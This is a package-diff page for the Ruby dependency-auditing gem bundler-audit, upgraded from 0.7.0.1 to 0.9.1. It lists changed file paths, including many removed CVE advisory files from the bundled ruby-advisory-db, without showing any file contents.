bundler-audit 0.7.0.1 → 0.9.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (613) hide show
  1. checksums.yaml +4 -4
  2. data/.github/FUNDING.yml +3 -0
  3. data/.github/ISSUE_TEMPLATE/bug-report.md +44 -0
  4. data/.github/ISSUE_TEMPLATE/feature-request.md +14 -0
  5. data/.github/workflows/ruby.yml +43 -0
  6. data/.gitignore +1 -0
  7. data/.rspec +1 -1
  8. data/.rubocop.yml +86 -0
  9. data/COPYING.txt +4 -4
  10. data/ChangeLog.md +116 -4
  11. data/Gemfile +8 -3
  12. data/README.md +108 -20
  13. data/Rakefile +7 -26
  14. data/bundler-audit.gemspec +2 -10
  15. data/gemspec.yml +9 -2
  16. data/lib/bundler/audit/advisory.rb +37 -4
  17. data/lib/bundler/audit/cli/formats/json.rb +65 -0
  18. data/lib/bundler/audit/cli/formats/junit.rb +127 -0
  19. data/lib/bundler/audit/cli/formats/text.rb +122 -0
  20. data/lib/bundler/audit/cli/formats.rb +148 -0
  21. data/lib/bundler/audit/cli/thor_ext/shell/basic/say_error.rb +33 -0
  22. data/lib/bundler/audit/cli.rb +113 -93
  23. data/lib/bundler/audit/configuration.rb +108 -0
  24. data/lib/bundler/audit/database.rb +157 -32
  25. data/lib/bundler/audit/report.rb +149 -0
  26. data/lib/bundler/audit/results/insecure_source.rb +78 -0
  27. data/lib/bundler/audit/results/result.rb +21 -0
  28. data/lib/bundler/audit/results/unpatched_gem.rb +98 -0
  29. data/lib/bundler/audit/results.rb +19 -0
  30. data/lib/bundler/audit/scanner.rb +106 -24
  31. data/lib/bundler/audit/task.rb +49 -6
  32. data/lib/bundler/audit/version.rb +3 -3
  33. data/lib/bundler/audit.rb +2 -2
  34. data/spec/advisory_spec.rb +52 -16
  35. data/spec/bundle/insecure_sources/Gemfile.lock +133 -85
  36. data/spec/bundle/secure/Gemfile.lock +65 -62
  37. data/spec/bundle/unpatched_gems/Gemfile.lock +6 -72
  38. data/spec/bundle/unpatched_gems_with_dot_configuration/.bundler-audit.yml +3 -0
  39. data/spec/bundle/unpatched_gems_with_dot_configuration/Gemfile +3 -0
  40. data/spec/bundle/unpatched_gems_with_dot_configuration/Gemfile.lock +31 -0
  41. data/spec/cli/formats/json_spec.rb +114 -0
  42. data/spec/cli/formats/junit_spec.rb +284 -0
  43. data/spec/cli/formats/text_spec.rb +273 -0
  44. data/spec/cli/formats_spec.rb +86 -0
  45. data/spec/cli_spec.rb +78 -26
  46. data/spec/configuration_spec.rb +78 -0
  47. data/spec/database_spec.rb +273 -52
  48. data/spec/fixtures/advisory/CVE-2020-1234.yml +21 -0
  49. data/spec/fixtures/{not_a_hash.yml → advisory/not_a_hash.yml} +0 -0
  50. data/spec/fixtures/config/bad/empty.yml +0 -0
  51. data/spec/fixtures/config/bad/ignore_contains_a_non_string.yml +4 -0
  52. data/spec/fixtures/config/bad/ignore_is_not_an_array.yml +3 -0
  53. data/spec/fixtures/config/valid.yml +4 -0
  54. data/spec/fixtures/lib/bundler/audit/cli/formats/bad.rb +17 -0
  55. data/spec/fixtures/lib/bundler/audit/cli/formats/good.rb +17 -0
  56. data/spec/integration_spec.rb +17 -89
  57. data/spec/report_spec.rb +98 -0
  58. data/spec/results/insecure_source_spec.rb +47 -0
  59. data/spec/results/result_spec.rb +10 -0
  60. data/spec/results/unpatched_gem_spec.rb +123 -0
  61. data/spec/scanner_spec.rb +90 -35
  62. data/spec/spec_helper.rb +42 -25
  63. metadata +65 -570
  64. data/.gitmodules +0 -3
  65. data/.travis.yml +0 -14
  66. data/data/ruby-advisory-db/.gitignore +0 -1
  67. data/data/ruby-advisory-db/.rspec +0 -1
  68. data/data/ruby-advisory-db/.travis.yml +0 -12
  69. data/data/ruby-advisory-db/CONTRIBUTING.md +0 -71
  70. data/data/ruby-advisory-db/CONTRIBUTORS.md +0 -41
  71. data/data/ruby-advisory-db/Gemfile +0 -11
  72. data/data/ruby-advisory-db/Gemfile.lock +0 -44
  73. data/data/ruby-advisory-db/LICENSE.txt +0 -5
  74. data/data/ruby-advisory-db/README.md +0 -133
  75. data/data/ruby-advisory-db/Rakefile +0 -22
  76. data/data/ruby-advisory-db/gems/Arabic-Prawn/CVE-2014-2322.yml +0 -12
  77. data/data/ruby-advisory-db/gems/RedCloth/CVE-2012-6684.yml +0 -21
  78. data/data/ruby-advisory-db/gems/VladTheEnterprising/CVE-2014-4995.yml +0 -13
  79. data/data/ruby-advisory-db/gems/VladTheEnterprising/CVE-2014-4996.yml +0 -13
  80. data/data/ruby-advisory-db/gems/actionmailer/CVE-2013-4389.yml +0 -17
  81. data/data/ruby-advisory-db/gems/actionpack/CVE-2012-1099.yml +0 -26
  82. data/data/ruby-advisory-db/gems/actionpack/CVE-2012-3424.yml +0 -28
  83. data/data/ruby-advisory-db/gems/actionpack/CVE-2012-3463.yml +0 -26
  84. data/data/ruby-advisory-db/gems/actionpack/CVE-2012-3465.yml +0 -23
  85. data/data/ruby-advisory-db/gems/actionpack/CVE-2013-0156.yml +0 -24
  86. data/data/ruby-advisory-db/gems/actionpack/CVE-2013-1855.yml +0 -20
  87. data/data/ruby-advisory-db/gems/actionpack/CVE-2013-1857.yml +0 -23
  88. data/data/ruby-advisory-db/gems/actionpack/CVE-2014-0081.yml +0 -24
  89. data/data/ruby-advisory-db/gems/actionpack/CVE-2014-0082.yml +0 -22
  90. data/data/ruby-advisory-db/gems/actionpack/CVE-2014-0130.yml +0 -23
  91. data/data/ruby-advisory-db/gems/actionpack/CVE-2014-7818.yml +0 -24
  92. data/data/ruby-advisory-db/gems/actionpack/CVE-2014-7829.yml +0 -26
  93. data/data/ruby-advisory-db/gems/actionpack/CVE-2015-7576.yml +0 -119
  94. data/data/ruby-advisory-db/gems/actionpack/CVE-2015-7581.yml +0 -55
  95. data/data/ruby-advisory-db/gems/actionpack/CVE-2016-0751.yml +0 -74
  96. data/data/ruby-advisory-db/gems/actionpack/CVE-2016-0752.yml +0 -96
  97. data/data/ruby-advisory-db/gems/actionpack/CVE-2016-2097.yml +0 -91
  98. data/data/ruby-advisory-db/gems/actionpack/CVE-2016-2098.yml +0 -89
  99. data/data/ruby-advisory-db/gems/actionpack/CVE-2016-6316.yml +0 -57
  100. data/data/ruby-advisory-db/gems/actionpack/CVE-2020-8164.yml +0 -49
  101. data/data/ruby-advisory-db/gems/actionpack/CVE-2020-8166.yml +0 -31
  102. data/data/ruby-advisory-db/gems/actionpack/OSVDB-100524.yml +0 -20
  103. data/data/ruby-advisory-db/gems/actionpack/OSVDB-100525.yml +0 -21
  104. data/data/ruby-advisory-db/gems/actionpack/OSVDB-100526.yml +0 -27
  105. data/data/ruby-advisory-db/gems/actionpack/OSVDB-100527.yml +0 -24
  106. data/data/ruby-advisory-db/gems/actionpack/OSVDB-100528.yml +0 -22
  107. data/data/ruby-advisory-db/gems/actionpack/OSVDB-74616.yml +0 -18
  108. data/data/ruby-advisory-db/gems/actionpack/OSVDB-77199.yml +0 -23
  109. data/data/ruby-advisory-db/gems/actionpack-page_caching/CVE-2020-8159.yml +0 -40
  110. data/data/ruby-advisory-db/gems/actionview/CVE-2016-0752.yml +0 -95
  111. data/data/ruby-advisory-db/gems/actionview/CVE-2016-2097.yml +0 -89
  112. data/data/ruby-advisory-db/gems/actionview/CVE-2016-6316.yml +0 -56
  113. data/data/ruby-advisory-db/gems/actionview/CVE-2019-5418.yml +0 -98
  114. data/data/ruby-advisory-db/gems/actionview/CVE-2019-5419.yml +0 -95
  115. data/data/ruby-advisory-db/gems/actionview/CVE-2020-5267.yml +0 -69
  116. data/data/ruby-advisory-db/gems/actionview/CVE-2020-8163.yml +0 -29
  117. data/data/ruby-advisory-db/gems/actionview/CVE-2020-8167.yml +0 -45
  118. data/data/ruby-advisory-db/gems/active-support/CVE-2018-3779.yml +0 -17
  119. data/data/ruby-advisory-db/gems/activejob/CVE-2018-16476.yml +0 -36
  120. data/data/ruby-advisory-db/gems/activemodel/CVE-2016-0753.yml +0 -95
  121. data/data/ruby-advisory-db/gems/activerecord/CVE-2012-2660.yml +0 -24
  122. data/data/ruby-advisory-db/gems/activerecord/CVE-2012-2661.yml +0 -25
  123. data/data/ruby-advisory-db/gems/activerecord/CVE-2013-0155.yml +0 -24
  124. data/data/ruby-advisory-db/gems/activerecord/CVE-2013-0276.yml +0 -21
  125. data/data/ruby-advisory-db/gems/activerecord/CVE-2013-0277.yml +0 -23
  126. data/data/ruby-advisory-db/gems/activerecord/CVE-2013-1854.yml +0 -26
  127. data/data/ruby-advisory-db/gems/activerecord/CVE-2014-0080.yml +0 -23
  128. data/data/ruby-advisory-db/gems/activerecord/CVE-2014-3482.yml +0 -23
  129. data/data/ruby-advisory-db/gems/activerecord/CVE-2014-3483.yml +0 -24
  130. data/data/ruby-advisory-db/gems/activerecord/CVE-2014-3514.yml +0 -23
  131. data/data/ruby-advisory-db/gems/activerecord/CVE-2015-7577.yml +0 -110
  132. data/data/ruby-advisory-db/gems/activerecord/CVE-2016-6317.yml +0 -73
  133. data/data/ruby-advisory-db/gems/activerecord/OSVDB-88661.yml +0 -20
  134. data/data/ruby-advisory-db/gems/activerecord-jdbc-adapter/OSVDB-114854.yml +0 -20
  135. data/data/ruby-advisory-db/gems/activerecord-oracle_enhanced-adapter/OSVDB-95376.yml +0 -15
  136. data/data/ruby-advisory-db/gems/activeresource/CVE-2020-8151.yml +0 -48
  137. data/data/ruby-advisory-db/gems/activeresource/OSVDB-95749.yml +0 -15
  138. data/data/ruby-advisory-db/gems/activestorage/CVE-2018-16477.yml +0 -43
  139. data/data/ruby-advisory-db/gems/activestorage/CVE-2020-8162.yml +0 -31
  140. data/data/ruby-advisory-db/gems/activesupport/CVE-2012-1098.yml +0 -26
  141. data/data/ruby-advisory-db/gems/activesupport/CVE-2012-3464.yml +0 -23
  142. data/data/ruby-advisory-db/gems/activesupport/CVE-2013-0333.yml +0 -25
  143. data/data/ruby-advisory-db/gems/activesupport/CVE-2013-1856.yml +0 -28
  144. data/data/ruby-advisory-db/gems/activesupport/CVE-2015-3226.yml +0 -55
  145. data/data/ruby-advisory-db/gems/activesupport/CVE-2015-3227.yml +0 -33
  146. data/data/ruby-advisory-db/gems/activesupport/CVE-2020-8165.yml +0 -41
  147. data/data/ruby-advisory-db/gems/administrate/CVE-2016-3098.yml +0 -14
  148. data/data/ruby-advisory-db/gems/administrate/CVE-2020-5257.yml +0 -24
  149. data/data/ruby-advisory-db/gems/aescrypt/CVE-2013-7463.yml +0 -10
  150. data/data/ruby-advisory-db/gems/airbrake-ruby/CVE-2019-16060.yml +0 -18
  151. data/data/ruby-advisory-db/gems/archive-tar-minitar/CVE-2016-10173.yml +0 -16
  152. data/data/ruby-advisory-db/gems/as/OSVDB-112683.yml +0 -10
  153. data/data/ruby-advisory-db/gems/authlogic/CVE-2012-6497.yml +0 -15
  154. data/data/ruby-advisory-db/gems/auto_awesomplete/OSVDB-132800.yml +0 -11
  155. data/data/ruby-advisory-db/gems/auto_select2/OSVDB-132800.yml +0 -13
  156. data/data/ruby-advisory-db/gems/awesome-bot/CVE-2019-15224.yml +0 -19
  157. data/data/ruby-advisory-db/gems/awesome_spawn/CVE-2014-0156.yml +0 -19
  158. data/data/ruby-advisory-db/gems/backup-agoddard/CVE-2014-4993.yml +0 -8
  159. data/data/ruby-advisory-db/gems/backup_checksum/CVE-2014-4993.yml +0 -12
  160. data/data/ruby-advisory-db/gems/backup_checksum/OSVDB-108570.yml +0 -10
  161. data/data/ruby-advisory-db/gems/bcrypt/OSVDB-62067.yml +0 -17
  162. data/data/ruby-advisory-db/gems/bcrypt-ruby/OSVDB-62067.yml +0 -19
  163. data/data/ruby-advisory-db/gems/bibtex-ruby/CVE-2019-10780.yml +0 -16
  164. data/data/ruby-advisory-db/gems/bio-basespace-sdk/CVE-2013-7111.yml +0 -8
  165. data/data/ruby-advisory-db/gems/bitcoin_vanity/CVE-2019-15224.yml +0 -18
  166. data/data/ruby-advisory-db/gems/blockchain_wallet/CVE-2019-15224.yml +0 -19
  167. data/data/ruby-advisory-db/gems/bootstrap/CVE-2016-10735.yml +0 -20
  168. data/data/ruby-advisory-db/gems/bootstrap/CVE-2018-14040.yml +0 -24
  169. data/data/ruby-advisory-db/gems/bootstrap/CVE-2019-8331.yml +0 -20
  170. data/data/ruby-advisory-db/gems/bootstrap-sass/CVE-2016-10735.yml +0 -20
  171. data/data/ruby-advisory-db/gems/bootstrap-sass/CVE-2019-10842.yml +0 -25
  172. data/data/ruby-advisory-db/gems/bootstrap-sass/CVE-2019-8331.yml +0 -20
  173. data/data/ruby-advisory-db/gems/brakeman/CVE-2019-18409.yml +0 -26
  174. data/data/ruby-advisory-db/gems/brbackup/CVE-2014-5004.yml +0 -11
  175. data/data/ruby-advisory-db/gems/brbackup/OSVDB-108899.yml +0 -12
  176. data/data/ruby-advisory-db/gems/brbackup/OSVDB-108900.yml +0 -11
  177. data/data/ruby-advisory-db/gems/bson/CVE-2015-4411.yml +0 -21
  178. data/data/ruby-advisory-db/gems/bson/CVE-2015-4412.yml +0 -18
  179. data/data/ruby-advisory-db/gems/builder/OSVDB-95668.yml +0 -13
  180. data/data/ruby-advisory-db/gems/bundler/CVE-2013-0334.yml +0 -15
  181. data/data/ruby-advisory-db/gems/bundler/OSVDB-115090.yml +0 -13
  182. data/data/ruby-advisory-db/gems/bundler/OSVDB-115091.yml +0 -12
  183. data/data/ruby-advisory-db/gems/bundler/OSVDB-115917.yml +0 -12
  184. data/data/ruby-advisory-db/gems/cairo/CVE-2017-7475.yml +0 -15
  185. data/data/ruby-advisory-db/gems/cap-strap/CVE-2014-4992.yml +0 -8
  186. data/data/ruby-advisory-db/gems/cap-strap/OSVDB-108575.yml +0 -7
  187. data/data/ruby-advisory-db/gems/capistrano-colors/CVE-2019-15224.yml +0 -19
  188. data/data/ruby-advisory-db/gems/chartkick/CVE-2019-12732.yml +0 -21
  189. data/data/ruby-advisory-db/gems/chartkick/CVE-2019-18841.yml +0 -13
  190. data/data/ruby-advisory-db/gems/chloride/CVE-2018-6517.yml +0 -17
  191. data/data/ruby-advisory-db/gems/ciborg/CVE-2014-5003.yml +0 -8
  192. data/data/ruby-advisory-db/gems/cocaine/CVE-2013-4457.yml +0 -15
  193. data/data/ruby-advisory-db/gems/codders-dataset/CVE-2014-4991.yml +0 -8
  194. data/data/ruby-advisory-db/gems/coin_base/CVE-2019-15224.yml +0 -18
  195. data/data/ruby-advisory-db/gems/colorscore/CVE-2015-7541.yml +0 -21
  196. data/data/ruby-advisory-db/gems/coming-soon/CVE-2019-15224.yml +0 -18
  197. data/data/ruby-advisory-db/gems/command_wrap/CVE-2013-1875.yml +0 -9
  198. data/data/ruby-advisory-db/gems/consul/CVE-2019-16377.yml +0 -15
  199. data/data/ruby-advisory-db/gems/crack/CVE-2013-1800.yml +0 -17
  200. data/data/ruby-advisory-db/gems/cremefraiche/CVE-2013-2090.yml +0 -11
  201. data/data/ruby-advisory-db/gems/cron_parser/CVE-2019-15224.yml +0 -20
  202. data/data/ruby-advisory-db/gems/curb/OSVDB-114600.yml +0 -12
  203. data/data/ruby-advisory-db/gems/curl/CVE-2013-2617.yml +0 -13
  204. data/data/ruby-advisory-db/gems/datagrid/CVE-2019-14281.yml +0 -14
  205. data/data/ruby-advisory-db/gems/delayed_job_web/CVE-2017-12097.yml +0 -17
  206. data/data/ruby-advisory-db/gems/devise/CVE-2013-0233.yml +0 -20
  207. data/data/ruby-advisory-db/gems/devise/CVE-2015-8314.yml +0 -14
  208. data/data/ruby-advisory-db/gems/devise/CVE-2019-16109.yml +0 -13
  209. data/data/ruby-advisory-db/gems/devise/CVE-2019-5421.yml +0 -16
  210. data/data/ruby-advisory-db/gems/devise/OSVDB-114435.yml +0 -17
  211. data/data/ruby-advisory-db/gems/devise-two-factor/CVE-2015-7225.yml +0 -22
  212. data/data/ruby-advisory-db/gems/doge-coin/CVE-2019-15224.yml +0 -19
  213. data/data/ruby-advisory-db/gems/doorkeeper/CVE-2014-8144.yml +0 -26
  214. data/data/ruby-advisory-db/gems/doorkeeper/CVE-2016-6582.yml +0 -43
  215. data/data/ruby-advisory-db/gems/doorkeeper/CVE-2018-1000088.yml +0 -39
  216. data/data/ruby-advisory-db/gems/doorkeeper/CVE-2018-1000211.yml +0 -39
  217. data/data/ruby-advisory-db/gems/doorkeeper/CVE-2020-10187.yml +0 -34
  218. data/data/ruby-advisory-db/gems/doorkeeper/OSVDB-118830.yml +0 -17
  219. data/data/ruby-advisory-db/gems/doorkeeper-openid_connect/CVE-2019-9837.yml +0 -16
  220. data/data/ruby-advisory-db/gems/dragonfly/CVE-2013-1756.yml +0 -16
  221. data/data/ruby-advisory-db/gems/dragonfly/CVE-2013-5671.yml +0 -14
  222. data/data/ruby-advisory-db/gems/dragonfly/OSVDB-110439.yml +0 -13
  223. data/data/ruby-advisory-db/gems/dragonfly/OSVDB-97854.yml +0 -12
  224. data/data/ruby-advisory-db/gems/easymon/CVE-2018-1000855.yml +0 -16
  225. data/data/ruby-advisory-db/gems/echor/CVE-2014-1834.yml +0 -12
  226. data/data/ruby-advisory-db/gems/echor/CVE-2014-1835.yml +0 -11
  227. data/data/ruby-advisory-db/gems/ember-source/CVE-2013-4170.yml +0 -25
  228. data/data/ruby-advisory-db/gems/ember-source/CVE-2014-0013.yml +0 -33
  229. data/data/ruby-advisory-db/gems/ember-source/CVE-2014-0014.yml +0 -30
  230. data/data/ruby-advisory-db/gems/ember-source/CVE-2014-0046.yml +0 -26
  231. data/data/ruby-advisory-db/gems/ember-source/CVE-2015-1866.yml +0 -26
  232. data/data/ruby-advisory-db/gems/ember-source/CVE-2015-7565.yml +0 -30
  233. data/data/ruby-advisory-db/gems/enum_column3/OSVDB-94679.yml +0 -9
  234. data/data/ruby-advisory-db/gems/espeak-ruby/CVE-2016-10193.yml +0 -15
  235. data/data/ruby-advisory-db/gems/excon/CVE-2019-16779.yml +0 -23
  236. data/data/ruby-advisory-db/gems/extlib/CVE-2013-1802.yml +0 -18
  237. data/data/ruby-advisory-db/gems/fastreader/CVE-2013-2615.yml +0 -13
  238. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2013-7222.yml +0 -17
  239. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2013-7223.yml +0 -19
  240. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2013-7224.yml +0 -17
  241. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2013-7225.yml +0 -19
  242. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2013-7249.yml +0 -16
  243. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2014-5441.yml +0 -19
  244. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2015-1585.yml +0 -17
  245. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2018-1000842.yml +0 -23
  246. data/data/ruby-advisory-db/gems/fat_free_crm/CVE-2018-20975.yml +0 -12
  247. data/data/ruby-advisory-db/gems/faye/CVE-2020-11020.yml +0 -91
  248. data/data/ruby-advisory-db/gems/features/CVE-2013-4318.yml +0 -8
  249. data/data/ruby-advisory-db/gems/festivaltts4r/CVE-2016-10194.yml +0 -12
  250. data/data/ruby-advisory-db/gems/ffi/CVE-2018-1000201.yml +0 -22
  251. data/data/ruby-advisory-db/gems/field_test/CVE-2019-13146.yml +0 -20
  252. data/data/ruby-advisory-db/gems/fileutils/CVE-2013-2516.yml +0 -11
  253. data/data/ruby-advisory-db/gems/fileutils/OSVDB-90715.yml +0 -7
  254. data/data/ruby-advisory-db/gems/fileutils/OSVDB-90716.yml +0 -7
  255. data/data/ruby-advisory-db/gems/fileutils/OSVDB-90718.yml +0 -7
  256. data/data/ruby-advisory-db/gems/flash_tool/CVE-2013-2513.yml +0 -8
  257. data/data/ruby-advisory-db/gems/flavour_saver/OSVDB-110796.yml +0 -14
  258. data/data/ruby-advisory-db/gems/flukso4r/OSVDB-101577.yml +0 -7
  259. data/data/ruby-advisory-db/gems/fog-dragonfly/CVE-2013-1756.yml +0 -18
  260. data/data/ruby-advisory-db/gems/fog-dragonfly/CVE-2013-5671.yml +0 -16
  261. data/data/ruby-advisory-db/gems/fog-dragonfly/OSVDB-110439.yml +0 -15
  262. data/data/ruby-advisory-db/gems/fog-dragonfly/OSVDB-97854.yml +0 -12
  263. data/data/ruby-advisory-db/gems/ftpd/CVE-2013-2512.yml +0 -18
  264. data/data/ruby-advisory-db/gems/geminabox/CVE-2017-16792.yml +0 -21
  265. data/data/ruby-advisory-db/gems/gemirro/CVE-2017-16833.yml +0 -22
  266. data/data/ruby-advisory-db/gems/git-fastclone/CVE-2015-8968.yml +0 -21
  267. data/data/ruby-advisory-db/gems/git-fastclone/CVE-2015-8969.yml +0 -13
  268. data/data/ruby-advisory-db/gems/gitlab-grit/CVE-2013-4489.yml +0 -14
  269. data/data/ruby-advisory-db/gems/gnms/OSVDB-108594.yml +0 -7
  270. data/data/ruby-advisory-db/gems/gollum/CVE-2015-7314.yml +0 -13
  271. data/data/ruby-advisory-db/gems/gollum-grit_adapter/CVE-2014-9489.yml +0 -23
  272. data/data/ruby-advisory-db/gems/grape/CVE-2018-3769.yml +0 -20
  273. data/data/ruby-advisory-db/gems/gtk2/CVE-2007-6183.yml +0 -20
  274. data/data/ruby-advisory-db/gems/gyazo/CVE-2014-4994.yml +0 -10
  275. data/data/ruby-advisory-db/gems/haml/CVE-2017-1002201.yml +0 -19
  276. data/data/ruby-advisory-db/gems/handlebars-source/OSVDB-131671.yml +0 -17
  277. data/data/ruby-advisory-db/gems/http/CVE-2015-1828.yml +0 -14
  278. data/data/ruby-advisory-db/gems/httparty/CVE-2013-1801.yml +0 -14
  279. data/data/ruby-advisory-db/gems/i18n/CVE-2014-10077.yml +0 -18
  280. data/data/ruby-advisory-db/gems/i18n/OSVDB-100528.yml +0 -17
  281. data/data/ruby-advisory-db/gems/iodine/GHSA-85rf-xh54-whp3.yml +0 -21
  282. data/data/ruby-advisory-db/gems/jekyll/CVE-2018-17567.yml +0 -14
  283. data/data/ruby-advisory-db/gems/jquery-rails/CVE-2015-1840.yml +0 -36
  284. data/data/ruby-advisory-db/gems/jquery-rails/CVE-2019-11358.yml +0 -24
  285. data/data/ruby-advisory-db/gems/jquery-ui-rails/CVE-2016-7103.yml +0 -23
  286. data/data/ruby-advisory-db/gems/jquery-ujs/CVE-2015-1840.yml +0 -35
  287. data/data/ruby-advisory-db/gems/jruby-openssl/CVE-2009-4123.yml +0 -16
  288. data/data/ruby-advisory-db/gems/jruby-sandbox/OSVDB-106279.yml +0 -12
  289. data/data/ruby-advisory-db/gems/json/CVE-2013-0269.yml +0 -20
  290. data/data/ruby-advisory-db/gems/json/CVE-2020-10663.yml +0 -35
  291. data/data/ruby-advisory-db/gems/json/OSVDB-101157.yml +0 -14
  292. data/data/ruby-advisory-db/gems/json-jwt/CVE-2018-1000539.yml +0 -21
  293. data/data/ruby-advisory-db/gems/json-jwt/CVE-2019-18848.yml +0 -15
  294. data/data/ruby-advisory-db/gems/kafo/CVE-2014-0135.yml +0 -15
  295. data/data/ruby-advisory-db/gems/kajam/CVE-2014-4999.yml +0 -12
  296. data/data/ruby-advisory-db/gems/kajam/OSVDB-108530.yml +0 -11
  297. data/data/ruby-advisory-db/gems/kaminari/CVE-2020-11082.yml +0 -34
  298. data/data/ruby-advisory-db/gems/karo/OSVDB-108573.yml +0 -10
  299. data/data/ruby-advisory-db/gems/karteek-docsplit/CVE-2013-1933.yml +0 -9
  300. data/data/ruby-advisory-db/gems/kcapifony/CVE-2014-5001.yml +0 -8
  301. data/data/ruby-advisory-db/gems/kcapifony/OSVDB-108572.yml +0 -7
  302. data/data/ruby-advisory-db/gems/kelredd-pruview/CVE-2013-1947.yml +0 -9
  303. data/data/ruby-advisory-db/gems/kompanee-recipes/OSVDB-108593.yml +0 -12
  304. data/data/ruby-advisory-db/gems/lawn-login/CVE-2014-5000.yml +0 -8
  305. data/data/ruby-advisory-db/gems/ldap_fluff/CVE-2012-5604.yml +0 -15
  306. data/data/ruby-advisory-db/gems/ldoce/CVE-2013-1911.yml +0 -9
  307. data/data/ruby-advisory-db/gems/lean-ruport/CVE-2014-4998.yml +0 -8
  308. data/data/ruby-advisory-db/gems/lingq/OSVDB-108585.yml +0 -7
  309. data/data/ruby-advisory-db/gems/lita_coin/CVE-2019-15224.yml +0 -18
  310. data/data/ruby-advisory-db/gems/loofah/CVE-2018-16468.yml +0 -16
  311. data/data/ruby-advisory-db/gems/loofah/CVE-2018-8048.yml +0 -11
  312. data/data/ruby-advisory-db/gems/loofah/CVE-2019-15587.yml +0 -13
  313. data/data/ruby-advisory-db/gems/loofah/OSVDB-90945.yml +0 -21
  314. data/data/ruby-advisory-db/gems/lynx/CVE-2014-5002.yml +0 -11
  315. data/data/ruby-advisory-db/gems/lynx/OSVDB-108579.yml +0 -7
  316. data/data/ruby-advisory-db/gems/mail/CVE-2011-0739.yml +0 -21
  317. data/data/ruby-advisory-db/gems/mail/CVE-2012-2139.yml +0 -14
  318. data/data/ruby-advisory-db/gems/mail/CVE-2012-2140.yml +0 -16
  319. data/data/ruby-advisory-db/gems/mail/CVE-2015-9097.yml +0 -26
  320. data/data/ruby-advisory-db/gems/mapbox-rails/OSVDB-129854.yml +0 -25
  321. data/data/ruby-advisory-db/gems/mapbox-rails/OSVDB-132871.yml +0 -26
  322. data/data/ruby-advisory-db/gems/marginalia/CVE-2019-1010191.yml +0 -17
  323. data/data/ruby-advisory-db/gems/matestack-ui-core/CVE-2020-5241.yml +0 -18
  324. data/data/ruby-advisory-db/gems/md2pdf/CVE-2013-1948.yml +0 -9
  325. data/data/ruby-advisory-db/gems/mini_magick/CVE-2013-2616.yml +0 -15
  326. data/data/ruby-advisory-db/gems/mini_magick/CVE-2019-13574.yml +0 -14
  327. data/data/ruby-advisory-db/gems/minitar/CVE-2016-10173.yml +0 -20
  328. data/data/ruby-advisory-db/gems/moped/CVE-2015-4410.yml +0 -17
  329. data/data/ruby-advisory-db/gems/multi_xml/CVE-2013-0175.yml +0 -16
  330. data/data/ruby-advisory-db/gems/mustache-js-rails/OSVDB-131671.yml +0 -17
  331. data/data/ruby-advisory-db/gems/mysql-binuuid-rails/CVE-2018-18476.yml +0 -21
  332. data/data/ruby-advisory-db/gems/net-ldap/CVE-2014-0083.yml +0 -14
  333. data/data/ruby-advisory-db/gems/net-ldap/CVE-2017-17718.yml +0 -17
  334. data/data/ruby-advisory-db/gems/netaddr/CVE-2019-17383.yml +0 -13
  335. data/data/ruby-advisory-db/gems/newrelic_rpm/CVE-2013-0284.yml +0 -17
  336. data/data/ruby-advisory-db/gems/nokogiri/CVE-2012-6685.yml +0 -15
  337. data/data/ruby-advisory-db/gems/nokogiri/CVE-2013-6460.yml +0 -18
  338. data/data/ruby-advisory-db/gems/nokogiri/CVE-2013-6461.yml +0 -15
  339. data/data/ruby-advisory-db/gems/nokogiri/CVE-2015-1819.yml +0 -52
  340. data/data/ruby-advisory-db/gems/nokogiri/CVE-2015-5312.yml +0 -92
  341. data/data/ruby-advisory-db/gems/nokogiri/CVE-2015-7499.yml +0 -37
  342. data/data/ruby-advisory-db/gems/nokogiri/CVE-2015-8806.yml +0 -42
  343. data/data/ruby-advisory-db/gems/nokogiri/CVE-2016-4658.yml +0 -33
  344. data/data/ruby-advisory-db/gems/nokogiri/CVE-2017-15412.yml +0 -23
  345. data/data/ruby-advisory-db/gems/nokogiri/CVE-2017-16932.yml +0 -21
  346. data/data/ruby-advisory-db/gems/nokogiri/CVE-2017-5029.yml +0 -44
  347. data/data/ruby-advisory-db/gems/nokogiri/CVE-2017-9050.yml +0 -60
  348. data/data/ruby-advisory-db/gems/nokogiri/CVE-2018-14404.yml +0 -69
  349. data/data/ruby-advisory-db/gems/nokogiri/CVE-2018-8048.yml +0 -36
  350. data/data/ruby-advisory-db/gems/nokogiri/CVE-2019-11068.yml +0 -49
  351. data/data/ruby-advisory-db/gems/nokogiri/CVE-2019-13117.yml +0 -80
  352. data/data/ruby-advisory-db/gems/nokogiri/CVE-2019-5477.yml +0 -31
  353. data/data/ruby-advisory-db/gems/nokogiri/CVE-2020-7595.yml +0 -20
  354. data/data/ruby-advisory-db/gems/nokogiri/OSVDB-118481.yml +0 -15
  355. data/data/ruby-advisory-db/gems/nori/CVE-2013-0285.yml +0 -19
  356. data/data/ruby-advisory-db/gems/omniauth/CVE-2015-9284.yml +0 -25
  357. data/data/ruby-advisory-db/gems/omniauth/CVE-2017-18076.yml +0 -18
  358. data/data/ruby-advisory-db/gems/omniauth-facebook/CVE-2013-4562.yml +0 -22
  359. data/data/ruby-advisory-db/gems/omniauth-facebook/CVE-2013-4593.yml +0 -17
  360. data/data/ruby-advisory-db/gems/omniauth-oauth2/CVE-2012-6134.yml +0 -16
  361. data/data/ruby-advisory-db/gems/omniauth-saml/CVE-2017-11430.yml +0 -17
  362. data/data/ruby-advisory-db/gems/omniauth_amazon/CVE-2019-15224.yml +0 -19
  363. data/data/ruby-advisory-db/gems/open-uri-cached/OSVDB-121701.yml +0 -13
  364. data/data/ruby-advisory-db/gems/openssl/CVE-2016-7798.yml +0 -16
  365. data/data/ruby-advisory-db/gems/ox/CVE-2017-15928.yml +0 -16
  366. data/data/ruby-advisory-db/gems/ox/CVE-2017-16229.yml +0 -16
  367. data/data/ruby-advisory-db/gems/padrino-contrib/CVE-2019-16145.yml +0 -11
  368. data/data/ruby-advisory-db/gems/paperclip/CVE-2015-2963.yml +0 -16
  369. data/data/ruby-advisory-db/gems/paperclip/CVE-2017-0889.yml +0 -23
  370. data/data/ruby-advisory-db/gems/paperclip/OSVDB-103151.yml +0 -13
